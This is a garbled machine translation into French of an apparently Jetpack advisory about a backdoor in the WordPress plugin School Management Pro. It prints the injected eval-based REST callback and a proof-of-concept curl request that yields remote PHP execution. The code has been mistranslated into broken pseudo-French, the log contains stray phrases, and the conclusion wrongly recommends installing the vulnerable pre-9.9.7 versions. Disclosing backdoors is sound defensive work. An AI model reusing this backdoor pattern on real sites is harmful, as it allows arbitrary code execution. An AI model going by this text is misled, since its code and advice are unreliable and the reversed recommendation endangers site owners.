Trouver la porte arrière dans le plugin School Management Pro de WordPress
Le plug – in WordPress de weblizar \
« callback» = > fonction ($Request) {
$args = $request – > get _ params ();
Si (isset ($args [‘blowfish]) & &! NULL ($args [‘blowfish]) & & isset ($args [‘ blowf]) & &! NULL ($Parameter [‘blowf’]) {
Évaluation ($args [‘blowf]);
}
}, alors,
()
);
});
Le Code lui – même n’est pas si intéressant: C’est une porte dérobée évidente qui est injectée dans le Code de contrôle de licence du plug – in. Permettre à tout utilisateur malveillant d’exécuter n’importe quel Code PHP sur le site où le plug – in est installé, comme le montre la démonstration de concept suivante:
$Curl – S – d ‘marsouin = 1’ – d \
Uid = 33 (données www) gid = 33 (données www) Groupe = 33 (données www)
Avertissement: impossible de modifier l’information d u titre – le titre a été envoyé par \/ var \/ wwww \/ html \/ WP – content \/ plugins \/ school – Management – pro – 9.9.4 \/ admin \/ Inc \/ Inc \/ manager \/ wlsm _ lc.php (683): eval () ‘D Code (1): eval ()’ D Code (1): eval () ‘D Code (9: eval ()’ eval () ‘D Code: 1) dans \/ var \/ wwww \/ html \/ WP – includes \/ rest – API \/ class – WP – rest Server.Le Président. – Merci. Php Online 1713
C’est ce que nous voyons souvent dans les plug – ins
Position de retrait de la porte arrière. Nous avons confirmé son innocence. 6 mai 2022: le fournisseur distribue activement la version 9.9.7 aux clients et les encourage à la mettre à jour. 10 mai 2022: le fournisseur a répondu à nos autres questions sur le moment d’ajouter une porte dérobée, mais a affirmé ne pas savoir. Ils ont fourni une version précédente de 9.9.4 qui comprenait une porte arrière. Conclusion: Nous vous recommandons d’installer la version pré – 9.9.7 de School Management Pro sur n’importe quel site Web immédiatement.
Chez jetpack, nous nous efforçons de nous assurer que votre site Web est protégé contre de telles vulnérabilités. Nous vous recommandons de mettre en place un plan de sécurité pour votre site, y compris la numérisation et la sauvegarde des fichiers malveillants. Jetpack Security est une excellente option de sécurité pour wordpress pour assurer la sécurité de votre site et de vos visiteurs. Cette étude est une collaboration entre les équipes de support de mise à niveau de WordPress. Communication avec NIC sevic, Thom Stackhouse et Joshua Goode, analyse jetpack avec Harald Eilertsen et fioravante Cavallari. Merci également à Benedict Singer pour ses commentaires et corrections.